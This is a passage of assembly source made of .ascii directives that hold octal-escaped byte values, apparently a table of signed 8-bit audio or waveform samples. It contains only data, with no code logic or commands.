"\030\030\027\026\024\022\017\016\015\015\016\017\021" .ascii "\021\022\022\023\024\027\032\037$)-010.+($!\034\027" .ascii "\022\015\010\004\001\376\373\367\361\351\337\326\316" .ascii "\310\307\311\315\324\332\341\346\355\362\370\375\002" .ascii "\011\016\023\027\034!&+/120-(!\034\025\020\013\006\003" .ascii "\376\373\366\363\360\355\353\353\352\352\352\352\351" .ascii "\350\350\347\347\351\352\354\356\357\360\360\361\362" .ascii "\362\363\364\365\364\364\363\362\357\355\353\351\351" .ascii "\350\350\347\350\347\346\345\345\343\342\341\340\337" .ascii "\336\336\337\342\345\352\356\363\366\367\370\370\367" .ascii "\365\363\362\361\360\360\361\361\364\366\371\374\377" .ascii "\003\005\010\011\012\013\014\014\015\016\021\022\023" .ascii "\025\026\027\030\032\033\035\036\036\037\036\036\035" .ascii "\036\035\036\036\037\037 \037\036\034\032\030\027\025" .ascii "\024\024\023\022\021\020\020\021\021\023\025\030\034" .ascii "\036 ! \036\035\032\030\025\023\020\015\012\011\006" .ascii "\003\002\377\373\366\357\347\337\330\324\321\322\323" .ascii "\327\333\337\343\350\353\360\365\370\375\001\006\012" .ascii "\017\024\031\036!$%$\" \035\031\026\022\017\014\011" .ascii "\006\003\000\375\372\367\366\363\362\357\356\353\352" .ascii "\347\345\344\343\343\342\343\343\344\345\346\347\347" .ascii "\350\351\352\353\354\355\355\355\354\355\354\353\354" .ascii "\354\355\356\356\356\355\355\353\352\347\345\342\341" .ascii "\336\335\334\335\336\340\343\345\346\347\350\347\347" .ascii "\346\345\345\345\346\347\352\355\361\364\371\376\001" .ascii "\006\011\014\016\020\021\022\022\023\023\024\025\025" .ascii "\024\025\025\025\024\025\026\025\024\025\024\023\022" .ascii "\023\022\023\024\025\026\027\030\030\027\027\026\027" .ascii "\026\026\026\026\025\026\025\026\025\026\027\030\031" .ascii "\032\033\033\032\031\026\024\021\016\013\011\006\003" .ascii "\001\000\375\374\371\366\363\356\351\343\336\331\326" .ascii "\325\326\330\333\340\344\351\354\361\364\371\374\000" .ascii "\004\007\012\017\022\025\031\033\035\035\034\033\030" .ascii "\026\023\020\016\013\010\007\004\002\000\377\374\373" .ascii "\372\371\370\366\365\364\362\361\356\355\354\353\352" .ascii "\351\352\351\351\350\350\350\350\350\350\351\352\351" .ascii "\351\352\351\351\352\352\353\353\354\356\357\360\361" .ascii "\361\360\360\357\355\354\351\350\347\347\346\346\346" .ascii "\347\350\350\350\347\346\345\344\343\343\342\344\345" .ascii "\350\352\357\362\370\375\005\012\020\023\027\031\034" .ascii "\035\036\037\036\035\032\032\026\027\022\025\016\021" .ascii "\012\017\376\371\002\006\035\365\335*\366\351\352\277" .ascii "\032A6\362\035\036\375!\002\353\030\352\010&\366\355" .ascii "\325\003\263\310\376\253\322\341\317;\021\330\376\354" .ascii "\377F4&\016\370\326\265\330\305\341\346\007\352\331" .ascii "\336\357\371\371\002\316\350\362\344\310\347\354\314" .ascii "\320\241\246\305\257\264\255\272\334\327\335\342\367" .ascii " \024\021\004\347\000\003\350\324\345\354\330\333\325" .ascii "\335\003\025&)5<#\035\031#.50\014\032/4I<-KJAFIQ<2\034" .ascii " 0(\036\032\011\016%\031\026\0337(#+$0!\002\361\353" .ascii "\352\363\337\324\351\362\374\036#\033.\026\377\003\370" .ascii "\371\344\274\266\267\300\274\257\307\301\330\351\333" .ascii "\347\330\332\345\357\362\002\032\006\360\357\372\007" .ascii "\376\363\000\004\024'\033 :Zf\\_TWI-*#('\017\011\025" .ascii "\032\032\015\030'',\027\012\030\017\373\356\361\360" .ascii "\360\360\324\323\345\347\337\331\334\351\355\346\337" .ascii "\334\326\330\310\267\300\303\317\307\256\266\275\301" .ascii "\310\305\324\355\360\342\316\310\321\310\310\277\272" .ascii "\313\323\322\327\367\020\027\037\025\0343.#\014\002" .ascii "\010\372\352\345\355\377\011\015\001\014\037\033&'8" .ascii "STH>@FA7+$.%\023\027\033'6/)5ED9+%*!\024\007\004\013" .ascii "\006\365\360\372\002\006\001\374\006\023\022\011\001" .ascii "\377\017\025\013\014\012\010\374\346\337\336\350\346" .ascii "\327\327\335\346\352\344\336\346\360\350\325\302\264" .ascii "\261\257\255\272\314\343\356\353\364\005\031\023\020" .ascii "\022\030$\034\020\022\037.:419A>16=@=,(/.!\020\006\013" .ascii "\012\000\364\363\375\010\011\001\015\030\034\030\015" .ascii "\010\016\020\376\351\345\346\342\334\313\317\336\343" .ascii "\344\340\350\367\376\365\343\334\343\341\327\311\304" .ascii "\314\310\270\247\247\255\265\265\263\301\325\343\345" .ascii "\351\367\013\012\371\350\346\344\336\317\276\302\311" .ascii "\316\316\320\340\373\006\001\377\003\017\015\002\375" .ascii "\001\016\016\003\377\007\031 \035\035+<?;7=FB5''1.!" .ascii "\034'8:77APMD@?F>+! $\036\020\020\032,89?IOH8*&#\022" .ascii "\370\350\347\345\336\323\322\336\351\347\325\310\310" .ascii "\314\311\303\310\322\336\332\313\312\315\323\316\304" .ascii "\310\327\345\350\347\362\011 % \035 \034\012\366\352" .ascii "\352\351\335" .ascii "\321\322\340\353\350\342\352\370\002\375\365\364\372" .ascii "\375\360\343\340\347\350\342\331\337\360\371\371\366" .ascii "\000\020\030\026\016\020\030\027\013\375\373\005\005" .ascii "\372\356\363\002\013\014\013\024#&\032\012\007\011\002" .ascii "\363\347\350\361\367\364\362\001\024\033\027\020\024" .ascii "\037\034\017\001\374\376\366\345\332\335\350\351\337" .ascii "\334\344\362\373\371\372\011\027\030\017\006\010\015" .ascii "\006\365\351\351\357\354\341\334\346\363\367\363\364" .ascii "\000\020\021\011\005\011\017\011\372\356\360\366\360" .ascii "\346\344\360\376\002\377\003\022\037!\031\027\",,!\034" .ascii " \"\031\011\002\010\020\016\006\007\025\" \030\027\034" .ascii "\037\017\364\342\334\333\325\317\330\354\000\010\011" .ascii "\024'54,-6:2&&1:7-,491((37-!\034\037\034\014\370\361" .ascii "\362\361\346\333\335\350\357\354\347\354\372\377\370" .ascii "\354\355\362\357\341\322\315\321\321\305\273\277\313" .ascii "\322\320\316\327\345\352\343\331\332\341\337\323\310" .ascii "\306\311\305\271\256\261\273\277\276\276\313\335\347" .ascii "\347\347\356\370\365\350\334\332\332\323\307\300\304" .ascii "\316\324\324\332\351\375\006\005\004\014\023\022\010" .ascii "\003\006\013\012\003\002\012\026\034\034\036)695259" .ascii "3( !$!\032\030!+.-/9BC=;>A:/()*& !,8?AELPJ?74/\"\023" .ascii "\011\010\005\376\365\363\367\370\361\346\341\341\342" .ascii "\341\337\342\353\360\356\351\350\354\357\354\352\355" .ascii "\366\377\003\006\017\035&'# \037\030\013\375\364\357" .ascii "\352\340\327\326\331\333\331\327\333\342\346\344\340" .ascii "\336\341\336\325\315\310\310\306\302\277\302\311\316" .ascii "\321\322\330\340\344\343\340\341\344\341\332\324\322" .ascii "\324\322\315\312\316\327\336\341\344\353\364\366\362" .ascii "\356\356\356\352\344\336\340\345\347\350\353\363\374" .ascii "\001\002\003\010\014\014\007\003\003\004\002\376\374" .ascii "\000\005\007\010\012\021\031\037#'/79879;70,+,)%$(," .ascii "--/3885454/'\"\037\036\032\025\024\027\033\034\034\036" .ascii "$()((,.-'\"\037\033\024\013\006\005\004\001\375\375" .ascii "\377\000\375\370\364\361\351\335\316\304\274\267\264" .ascii "\263\267\300\311\320\326\337\350\360\364\365\370\375" .ascii "\377\376\375\377\003\005\005\004\004\006\005\003\000" .ascii "\377\000\377\373\366\363\360\355\346\340\334\333\332" .ascii "\327\325\326\331\333\334\335\337\344\347\346\346\347" .ascii "\351\350\345\342\340\341\340\336\335\337\343\347\350" .ascii "\353\357\362\365\365\364\365\367\367\364\362\362\361" .ascii "\357\353\351\351\353\354\355\360\366\374\001\004\006" .ascii "\011\013\011\006\001\376\374\370\365\363\365\371\375" .ascii "\001\007\016\027\033\036!$&&$###\"!!$')*,1454221-'#" .ascii "! \035\033\033\034\036\037\037 #$#\" \037\036\033\026" .ascii "\024\023\022\020\020\021\025\031\034\036\037 \035\030" .ascii "\023\017\012\003\374\367\362\357\352\346\342\337\333" .ascii "\326\317\313\311\310\307\310\313\317\322\325\327\332" .ascii "\335\341\343\346\352\360\365\373\000\007\016\023\026" .ascii "\026\025\023\017\011\003\375\370\364\357\353\351\350" .ascii "\350\347\347\350\352\353\352\351\350\347\345\341\336" .ascii "\334\333\331\330\327\331\333\336\340\343\346\351\353" .ascii "\354\354\355\354\353\351\346\345\345\344\343\343\346" .ascii "\351\354\357\362\364\367\370\366\365\364\362\360\355" .ascii "\353\353\354\354\356\357\362\365\367\370\371\373\374" .ascii "\375\374\375\375\376\377\000\002\005\010\013\016\021" .ascii "\025\032\035!$'+-./00/.,+*)('()()*+----,+)%#! \035\034" .ascii "\033\034\035\035\036!\"$&'())(&$!\035\031\025\022\017" .ascii "\014\012\010\006\006\004\001\375\370\364\354\345\334" .ascii "\326\317\313\312\311\314\320\326\333\340\347\356\362" .ascii "\367\373\376\001\004\007\010\013\014\016\016\017\016" .ascii "\015\014\013\010\006\005\002\377\373\370\365\362\355" .ascii "\352\347\344\343\340\336\335\336\335\334\334\335\336" .ascii "\336\336\335\336\335\335\333\332\332\331\330\327\330" .ascii "\330\331\332\333\334\336\337\340\341\342\342\343\344" .ascii "\343\342\342\341\337\335\334\334\333\333\333\335\336" .ascii "\341\342\344\345\346\346\345\344\343\342\340\337\336" .ascii "\340\342\346\351\356\363\371\377\004\007\014\016\021" .ascii "\022\023\024\026\027\027\031\032\034\035\" &\034* \"" .ascii "5'3\024\030 !%07\037IH9<*\026\006\034)+\036%\002\017" .ascii "%\017\006\017\032\366$\021\0345\0322+)2'(,,$\021*7\033" .ascii "\022\027\014\005\371\365\363\357\364\377\350\351\377" .ascii "\355\343\363\001\350\350\352\370\372\376\003\0140\020" .ascii "#3*42,1;65)&#\035\005\003\010\015\013\010\025\012\370" .ascii "\000\374\353\367\354\345\332\337\331\316\332\310\316" .ascii "\342\345\355\355\360\360\342\364\355\343\375\362\364" .ascii "\003\362\371\372\356\356\353\355\353\371\377\355\342" .ascii "\353\320\307\321\322\321\316\325\305\306\315\312\275" .ascii "\265\302\303\320\334\322\325\317\322\326\331\364\355" .ascii "\365\007\362\004\006\364\016\016\004\016\026\027\017" .ascii "\017\002\367\004\374\005\007\013\015\374\000\367\352" .ascii "\361\373\364\375\016\020\006\014\026\011\007\014\030" .ascii "$%&\023\026\024\001\030\017\012\036\030\026\035\014" .ascii "\010\014\010\013\017\026\016\004\000\371\354\361\360" .ascii "\356\367\002\376\373\003\367\361\360\357\361\363\370" .ascii "\362\361\360\351\345\344\355\360\366\377\001\005\004" .ascii "\371\002\001\374\006\011\024\027\023\015\005\014\016" .ascii "\016\031\035\036!#\033\025\021\022\023\032###\"\034" .ascii "\017\015\014\014\017\017\021\017\013\003\366\366\364" .ascii "\356\371\370\367\372\362\357\345\337\344\345\356\364" .ascii "\370\375\366\365\366\366\374\004\014\022\025\031\025" .ascii "\015\012\004\000\001\007\007\012\005\374\370\354\355" .ascii "\350\345\355\346\350\351\333\333\331\323\332\337\350" .ascii "\364\375\000\001\010\010\014\025\032$*//--*$(-/461&" .ascii "\"\031\024\024\023\025\024\021\017\007\003\376\371\374" .ascii "\000\005\015\016\017\017\010\013\014\017\027\034!#\"" .ascii "\037\036\034\032\036 #& \033\026\015\003\376\375\372" .ascii "\372\372\363\354\346\335\326\323\321\320\322\325\321" .ascii "\321\321\312\315\316\324\337\347\360\366\370\370\370" .ascii "\372\375\002\014\021\026\030\031\025\017\014\010\007" .ascii "\010\012\007\002\374\364\353\350\346\346\352\353\360" .ascii "\361\360\356\352\353\352\354\364\366\372\375\367\363" .ascii "\360\355\355\357\362\363\366\364\357\353\344\336\335" .ascii "\332\334\335\335\334\327\321\316\317\317\324\333\341" .ascii "\345\350\347\346\343\343\344\346\355\360\363\363\357" .ascii "\354\350\343\345\346\351\355\354\351\345\340\332\327" .ascii "\330\332\336\343\347\351\347\346\346\347\354\363\372" .ascii "\002\011\014\015\016\017\021\026\035#*-.+(#\037!#%(" .ascii "&$\035\026\020\013\011\011\013\014\013\011\004\377\373" .ascii "\371\374\000\007\016\021\023\023\023\023\026\033 &-" .ascii "-,)$\037\033\033\034\035\036\032\025\015\001\372\362" .ascii "\355\353\350\345\341\333\323\316\312\312\316\326\340" .ascii "\350\357\364\370\372\000\006\017\031$-25421135874.%" .ascii "\034\025\020\014\015\013\012\007\000\372\364\360\357" .ascii "\361\365\372\376\377\376\374\372\371\374\000\007\014" .ascii "\020\022\020\015\011\007\006\010\013\016\016\015\010" .ascii "\001\373\367\365\365\370\371\370\365\360\353\345\340" .ascii "\340\342\346\352\355\354\353\350\346\345\350\355\363" .ascii "\371\374\374\372\367\364\363\366\373\001\006\012\013" .ascii "\011\006\003\001\002\006\012\015\017\016\012\007\004" .ascii "\003\006\013\021\027\032\033\032\027\026\026\031\036" .ascii "#()($\037\034\032\032\035\037 \037\033\025\016\007\004" .ascii "\003\003\005\006\006\002\375\371\365\365\367\374\001" .ascii "\006\010\010\006\003\002\002\004\011\015\017\017\014" .ascii "\006\377\372\365\362\361\360\356\351\342\333\323\316" .ascii "\314\314\316\323\326\330\330\331\331\333\337\346\357" .ascii "\371\000\006\012\014\015\016\021\026\033\037!!\037\032" .ascii "\025\021\017\017\016\016\015\011\003\375\366\360\355" .ascii "\353\353\351\350\346\341\334\330\325\325\330\333\340" .ascii "\343\344\345\344\345\345\350\354\361\366\371\372\371" .ascii "\370\365\364\365\367\371\372\372\367\363\355\350\343" .ascii "\340\337\336\335\332\327\322\315\312\310\310\312\315" .ascii "\320\323\324\324\325\326\331\336\345\354\363\370\375" .ascii "\000\001\003\006\012\015\022\025\026\026\025\022\017" .ascii "\017\016\016\017\017\016\014\011\005\002\001\002\003" .ascii "\005\010\011\012\011\011\010" .ascii "\011\014\017\022\025\026\026\025\023\022\021\022\023" .ascii "\025\026\025\023\020\015\012\011\010\010\011\010\007" .ascii "\004\001\376\373\372\372\373\374\375\374\373\370\365" .ascii "\362\361\360\357\357\356\355\352\347\345\344\345\346" .ascii "\351\354\357\362\364\365\367\370\373\000\003\010\013" .ascii "\016\017\017\020\020\021\023\026\027\030\031\030\027" .ascii "\026\025\026\026\027\027\030\027\025\022\020\016\014" .ascii "\014\013\012\010\007\004\000\375\372\370\367\367\366" .ascii "\366\364\363\362\360\357\360\361\364\367\370\372\372" .ascii "\373\374\376\377\002\005\007\010\011\007\006\005\002" .ascii "\001\000\377\376\374\371\366\361\356\353\350\347\346" .ascii "\345\343\342\341\340\340\341\344\347\354\361\366\373" .ascii "\000\003\010\014\021\026\033\037#%'(()*++,+)&#!\036" .ascii "\035\032\031\030\026\025\022\017\016\016\015\016\017" .ascii "\020\020\021\022\021\022\023\024\026\031\032\033\034" .ascii "\034\033\034\033\034\035\035\034\033\031\027\024\021" .ascii "\016\015\012\007\005\001\376\371\366\361\356\353\350" .ascii "\347\345\342\341\340\337\337\340\343\346\353\356\363" .ascii "\366\371\376\001\006\012\017\024\027\031\034\034\035" .ascii "\035\034\035\034\033\032\031\026\023\021\016\015\014" .ascii "\013\012\011\010\007\006\005\004\003\004\003\004\003" .ascii "\002\001\000\377\377\376\375\376\376\375\374\373\371" .ascii "\370\366\366\365\364\364\363\362\362\361\360\361\360" .ascii "\361\362\363\364\364\363\364\363\363\362\361\362\361" .ascii "\360\357\355\352\351\350\346\345\344\343\342\341\340" .ascii "\337\340\340\342\343\346\350\353\355\360\363\366\371" .ascii "\374\001\004\007\012\015\020\021\024\025\027\030\032" .ascii "\032\033\033\032\031\030\027\026\025\024\023\021\020" .ascii "\017\014\012\010\007\006\004\003\002\001\377\376\376" .ascii "\375\376\376\377\000\001\002\003\004\005\006\007\010" .ascii "\011\012\011\012\011\010\007\006\005\003\002\377\375" .ascii "\372\365\362\355\351\346\342\335\332\327\323\321\317" .ascii "\317\316\317\322\324\330\333\337\344\350\355\362\370" .ascii "\375\002\007\014\017\022\023\026\027\027\030\030\027" .ascii "\026\024\023\020\015\013\010\007\004\002\377\374\373" .ascii "\371\366\365\364\363\362\362\361\361\360\361\360\361" .ascii "\361\362\362\363\364\364\363\364\365\364\365\364\365" .ascii "\364\365\364\364\363\362\362\361\361\360\360\357\356" .ascii "\354\353\351\350\347\346\344\343\342\341\340\337\336" .ascii "\335\334\335\334\335\334\335\336\337\340\343\346\351" .ascii "\354\357\362\365\370\373\376\001\003\006\007\012\013" .ascii "\015\016\017\020\021\021\022\022\023\022\023\022\023" .ascii "\022\022\021\022\021\021\020\017\017\016\015\014\014" .ascii "\013\013\012\011\010\007\006\006\005\004\004\004\004" .ascii "\003\004\003\004\003\004\004\005\006\005\005\006\005" .ascii "\006\005\005\004\003\001\000\376\373\371\366\363\360" .ascii "\354\351\346\343\340\336\334\333\332\333\333\335\336" .ascii "\341\344\347\354\357\364\370\375\002\007\012\017\021" .ascii "\025\027\032\033\034\035\035\036\035\034\032\032\027" .ascii "\027\024\024\017\020\013\013\006\006\376\377\372\373" .ascii "\370\371\370\370\371\370\367\355\361\336\377\016\032" .ascii "\322\354\023\375\033K!\030%\320\362\000\011\356\344" .ascii "\0002\020:/\024\37567\311#\334\320\315\316\021\010\300" .ascii "\246\267\342\0166D7:\016\030\344\360\015\366\366\352" .ascii "\316\335\343\271\267\272\342\337\344\353\352\361\332" .ascii "\325\315\325\354\330\261\243\261\262\305\316\263\310" .ascii "\311\272\300\265\276\345\330\341\343\337\377\364\020" .ascii "\027\024&!\023\035\032\036,\014\377\010\034\011\021" .ascii "'3B65\035\023#*\027\0353;=C7>Z>915;#\034\013\027!\003" .ascii "\366\032\032 \032\371\023'\033\020\017\000\003\030\375" .ascii "\347\354\343\335\312\311\314\331\353\354\351\361\030" .ascii "5-\030\031\012\011\376\343\343\323\316\315\276\316\340" .ascii "\361\367\365\022#&\012\341\342\002\006\002\004\000\007" .ascii "\014\012\377\013#(%!3IGAIYchM9:2.\033\017\034%#\034" .ascii "\010\030%\037\025\374\001\006\370\344\326\307\317\325" .ascii "\316\305\320\343\335\330\321\333\335\326\323\313\307" .ascii "\326\314\266\262\265\272\271\272\266\316\330\324\317" .ascii "\316\334\354\362\362\350\356\354\322\305\266\273\315" .ascii "\317\310\324\345\002\030'4=KG<.00\027\374\357\356\370" .ascii "\375\370\002!31++5IJEEGH3\037\026\033\037\027\012\016" .ascii "\021$'\032\"-4(%\034\037\035\007\362\356\367\372\360" .ascii "\350\360\373\002\002\376\374\012\021\004\374\374\372" .ascii "\375\354\333\347\365\006\001\365\371\375\003\374\357" .ascii "\365\375\374\363\343\342\352\356\343\327\336\350\340" .ascii "\312\266\272\320\350\356\362\012\036%\036\027\031#$" .ascii "\024\010\021\030\035\"\":Q\\SIRVSB004(\025\010\004\012" .ascii "\011\374\362\374\006\005\000\373\007\023\025\011\374" .ascii "\373\001\366\340\324\325\325\321\306\275\312\327\327" .ascii "\324\323\335\355\354\342\331\334\337\317\275\263\271" .ascii "\304\303\272\272\300\304\301\270\270\305\327\330\320" .ascii "\323\340\360\356\353\353\357\367\356\341\334\347\357" .ascii "\352\341\340\355\375\375\372\376\011\023\012\375\373" .ascii "\006\024\024\016\025#01,4CJF<9@D7*%*/%\035$2:96:IRF" .ascii ":6:;)\031\026\033\034\022\006\014\033#!\036.AKD6.,\"" .ascii "\007\361\347\345\340\320\305\313\332\344\343\336\345" .ascii "\354\341\310\265\261\271\277\266\261\273\306\314\305" .ascii "\300\316\337\350\350\353\370\014\022\021\023 ,&\025" .ascii "\002\376\000\372\353\343\354\371\376\371\371\004\020" .ascii "\017\004\373\377\007\377\356\346\352\361\361\351\345" .ascii "\363\003\007\004\006\023! \025\017\023\030\017\376\364" .ascii "\367\376\372\362\362\376\012\013\005\010\026\" \024" .ascii "\016\015\012\372\343\330\334\341\334\326\333\357\004" .ascii "\013\015\022\037'\035\014\002\001\372\347\320\306\311" .ascii "\315\311\305\314\336\356\357\354\362\004\017\013\001" .ascii "\377\004\004\367\346\342\350\354\344\334\342\361\374" .ascii "\374\371\377\017\027\017\007\007\014\015\377\361\360" .ascii "\366\370\362\351\361\001\015\014\012\025\"+%\034\035" .ascii "$%\031\022\031'-&\036#.1(!'12'\035\036$ \020\001\375" .ascii "\373\357\332\315\324\347\365\371\376\021%,'!&-(\033" .ascii "\022\026 #\037!2BF>8=B=.!\035\036\021\373\354\353\354" .ascii "\345\331\323\336\352\354\346\346\360\373\370\353\343" .ascii "\345\347\335\315\303\307\314\306\274\272\305\322\323" .ascii "\316\320\335\350\346\334\327\332\333\317\277\272\277" .ascii "\305\301\270\270\302\313\312\304\306\323\336\334\326" .ascii "\331\343\354\347\336\335\343\346\337\325\325\335\344" .ascii "\342\335\343\362\375\376\375\000\012\016\007\376\376" .ascii "\006\013\010\005\013\030#$$+8?;5599/$\"%'!\034!-444" .ascii ";EID<;>;/%\"%$\036\031\036)237BMRLC>:1 \021\013\010" .ascii "\003\372\363\367\376\000\374\370\371\370\357\340\323" .ascii "\321\324\322\315\313\320\327\331\330\331\343\357\365" .ascii "\367\373\006\021\026\025\026\033\035\030\013\000\373" .ascii "\370\360\347\342\343\347\346\343\342\346\353\351\343" .ascii "\337\340\340\331\320\312\311\313\307\302\302\311\321" .ascii "\324\326\332\342\351\350\345\342\344\345\340\330\324" .ascii "\326\330\327\323\324\333\342\344\347\354\366\376\375" .ascii "\372\370\370\366\356\344\340\340\341\340\340\346\362" .ascii "\375\003\010\016\025\030\025\020\014\012\006\377\367" .ascii "\364\370\373\374\377\006\021\032\036!(1664464.(&&&#" .ascii "!$*-//2574//.+$\037\034\034\032\025\023\023\030\033" .ascii "\032\033\037#$\"\037\036\037\035\031\025\026\030\027" .ascii "\023\017\016\017\015\011\006\005\006\004\375\370\365" .ascii "\363\354\343\331\321\311\277\266\261\262\270\275\302" .ascii "\312\324\336\344\346\351\355\361\361\357\356\361\365" .ascii "\371\374\000\007\016\020\020\017\020\020\014\006\001" .ascii "\375\371\362\353\345\343\340\335\333\333\337\342\344" .ascii "\346\350\353\355\355\353\352\353\352\347\343\341\341" .ascii "\342\342\341\342\346\353\356\357\362\367\372\372\370" .ascii "\367\370\367\364\360\360\362\363\362\361\362\365\367" .ascii "\367\367\370\373\376\377\377\001\004\005\004\002\001" .ascii "\001\377\374\371\371\372\374\375\377\002\010\016\020" .ascii "\023\026\032\034\033\032\032\034\035\034\035 #&)+-1" .ascii "3200/,'!\037\035\033\030\027\030\032\035\036\037!##" .ascii "!\036\035\033\030\023\017\015\014\014\012\012\014\017" .ascii "\022\026\031\036!\"\037\034\030\024\015\005\376\370" .ascii "\365\360\354\351\350\350\347\344\340\335\330\322\313" .ascii "\305\304\302\303\304\306\311\316\323\326" .ascii "\333\341\350\356\363\371\000\007\013\017\022\024\025" .ascii "\023\016\011\006\002\376\371\366\365\364\363\361\361" .ascii "\361\362\361\357\355\354\352\350\344\341\337\336\335" .ascii "\333\334\337\340\343\346\350\353\356\357\357\357\357" .ascii "\356\354\352\350\350\347\346\345\346\351\353\356\361" .ascii "\364\370\373\374\374\373\372\367\364\360\355\354\353" .ascii "\354\354\356\363\367\372\374\377\002\003\001\000\376" .ascii "\375\374\371\370\370\373\375\000\004\012\020\025\031" .ascii "\036\"&)++,-,+)()(''(*+,,-.-,+*)(%\" \037\036\033\033" .ascii "\033\034\035\035\036 !\"!! !! \037\037\037\035\033\031" .ascii "\027\026\023\021\017\016\013\011\006\002\376\372\364" .ascii "\356\347\337\330\321\313\310\307\310\313\317\324\332" .ascii "\340\345\351\354\361\364\366\367\372\375\000\003\007" .ascii "\012\015\020\021\021\020\017\015\012\007\002\377\373" .ascii "\366\361\354\351\347\344\342\341\342\341\342\341\342" .ascii "\341\342\341\340\337\336\335\334\332\331\331\330\331" .ascii "\330\331\333\334\336\337\340\342\342\343\342\342\342" .ascii "\342\341\340\340\341\341\341\341\341\341\343\342\343" .ascii "\342\343\343\344\344\345\346\345\346\345\345\344\344" .ascii "\342\342\342\345\345\350\352\362\366\377\003\012\014" .ascii "\022\023\026\026\027\030\027\031\026\033\027\036\030" .ascii "!\030$\025\033\000\016-\000\365\002\355\001/\030\011" .ascii "\341?*\352\332+.\356:\020( \335\324\333\374\367\363" .ascii "\314\354\022\307\343\360\000\013\352\325\350\347\356" .ascii "\004\030\021\276\341\011\366\312\336\352\324\353\344" .ascii "\325\001#\037)\027PJ\016NJ\362\012$\027\037&\015\345" .ascii "\011\365\304\267\226\247\260\235\270\324\327\302\333" .ascii "\357\026)\031\010.H)2HD\012#\016\362\0307\375\377\026" .ascii "\023\373\355\024\022\004\347\017\005\004\005\365\000" .ascii "\032\022\025\351\023\024\334\376\003\026\357\365\357" .ascii "\364\016\013\347\346\010\005\347\012(0\032\035#9S3J" .ascii ":M85?Q2\0254@7*\020\367\367\336\354\315\345\341\257" .ascii "\250\314\347\343\352\357\361\371\371\360\333\375\023" .ascii "\374\356\014G\001\022\022\010\033*\031\003\035\035\015" .ascii "\375.90\030$\025\012\002\352\361\327\330\313\272\355" .ascii "\353\312\316\336\362\346\357\374\365\357\005\370\004" .ascii "\020!\022\370\023\027\017\373 \366\357\371\353\001\371" .ascii "\355\342\350\017\035\367\002\015\025\021\011\016\006" .ascii "\347\346\330\355\374\347\305\223\252\263\256\257\304" .ascii "\271\265\306\325\364\025#\031&LC<JQF\014\031(\030\031" .ascii "\010\000\017\034\025\365\367\367\345\342\350\012\363" .ascii "\357\344\337\013\375\015\007\361\367\377\361\002!\007" .ascii "\024\366\000\022\012\020\372\001\004\013\015 \035\024" .ascii "\022*9)D=2NCBB;@\037\011\036@0,\036\031\021\013\010" .ascii "\360\375\364\330\333\366\325\325\334\322\312\344\337" .ascii "\322\317\270\270\255\276\347\363\341\357\373\033\027" .ascii "\021%-\013\031!\03146\033$PN7\"0\034\012\001\374\375" .ascii "\374\354\332\327\371\367\352\363\362\372\351\336\375" .ascii "\373\323\317\312\342\344\334\310\305\310\300\301\314" .ascii "\332\322\322\316\351\357\030\013\366 \034\026'A2-\017" .ascii " !\031&\007\364\340\346\333\303\300\277\252\247\260" .ascii "\316\323\325\350\334\005\025\017\010\375\035\377\341" .ascii "\373\364\337\325\317\306\326\352\341\337\344\355\344" .ascii "\353\012\023\023\021\030\"BB<$4H?K>A.,(/)\026\023\006" .ascii "\015\014\007\012\021\014\360\362\375\014\006\354\373" .ascii "\376\000\370\364\357\365\363\327\361\003\026\005\006" .ascii "!+55;*1$\035 8&\023\014\031\031\006'#\016\364\347\324" .ascii "\351\343\317\320\344\373\006\003\002\015\000\004\014" .ascii "\025\022\007\003\373\373\031\370\355\001\372\370\350" .ascii "\351\333\330\327\327\340\324\363\362\346\362\000\005" .ascii "\006\031\030\023\002\004\004\023\030\000\351\342\356" .ascii "\343\361\373\374\330\322\372\360\371\020\006\373\014" .ascii "\023\023\022\026\026\376\374\007\005\366\344\332\321" .ascii "\305\312\311\267\273\267\232\253\304\262\261\310\344" .ascii "\337\351\011\006\014\017\021\015\017\034\017\362\352" .ascii "\365\365\362\365\350\355\365\374\003\017!\023\037 &" .ascii "18B'&00&)\"\025\016\015\034\026\012\004\003\002\011" .ascii "\004\006\014\006\002\002\006\032\001\356\372\356\374" .ascii "\000\010\363\366\364\344\346\366\001\374\377\377\035" .ascii "$)8<089987'\020\035)\037\020\015\377\350\354\014\352" .ascii "\330\332\303\307\346\012\000\001\016\011\023\022 (\033" .ascii "\024\012\013\023\032\005\370\003\001\365\371\373\355" .ascii "\334\322\332\343\343\354\353\343\372\360\361\373\011" .ascii "\001\361\001\000\001\377\365\345\341\346\357\346\341" .ascii "\337\342\333\352\375\367\365\377\373\375\035\023\033" .ascii "\024\"$\015\015\034\011\362\366\362\366\363\353\337" .ascii "\337\324\326\314\322\327\317\300\303\324\342\336\345" .ascii "\361\361\374\363\375\363\362\327\325\337\321\325\305" .ascii "\324\315\310\332\343\357\365\001\362\365\020\030\033" .ascii "\020\024\031\033#,!\035\034\034\036&2\037\037-1155+" .ascii "4>,3B?0$)&\037\026\023\015\004\372\000\374\003\375\371" .ascii "\367\006\021\016\030 %\027\037#+\031\017\003\374\366" .ascii "\371\355\337\345\335\330\325\341\324\315\300\277\277" .ascii "\313\330\322\333\357\001\003\020 #\034\"+%-.-\031'." .ascii "!.'%$$\037\037\037\036\020\035\026 \035\015&\021\004" .ascii "\012\023\005\366\356\352\347\342\337\320\313\320\310" .ascii "\277\310\323\304\277\313\334\332\333\354\331\325\333" .ascii "\343\344\340\344\325\334\326\331\340\342\337\337\346" .ascii "\341\355\343\345\352\342\336\352\364\356\354\370\372" .ascii "\374\000\017\015\012\030\005\000\377\016\004\377\001" .ascii "\375\007\001\010\013\020\030\017\017#'\035\025\024\025" .ascii "\026\021\015\006\004\000\377\000\007\006\000\377\011" .ascii "\021\016\017\026\031\014\011\022\034\020\017\011\011" .ascii "\020\011\356\362\372\375\354\356\372\360\375\354\376" .ascii "\000\016\016\012\030(2,9CA6800*$\022\016\024\014\376" .ascii "\375\010\373\355\360\355\353\357\334\344\342\361\377" .ascii "\367\010\032\012\011\027\032\037\022\027\016\023\022" .ascii "\016\015\020\030\013\012\016\021\010\000\001\002\375" .ascii "\375\377\371\367\373\347\356\363\366\346\334\345\333" .ascii "\333\337\344\326\340\327\326\311\325\332\315\326\323" .ascii "\347\344\337\335\346\343\356\356\346\365\362\354\351" .ascii "\370\373\361\360\370\371\371\375\377\376\005\005\376" .ascii "\375\376\373\362\356\364\377\355\377\372\371\002\374" .ascii "\372\371\003\370\373\361\004\371\364\376\376\003\000" .ascii "\014\006\014\016\022\004\011\016\007\377\377\002\374" .ascii "\366\366\375\370\374\376\375\377\013\012\011\015\020" .ascii "\014\014\027\035\031\026\032\024\026\027\005\004\004" .ascii 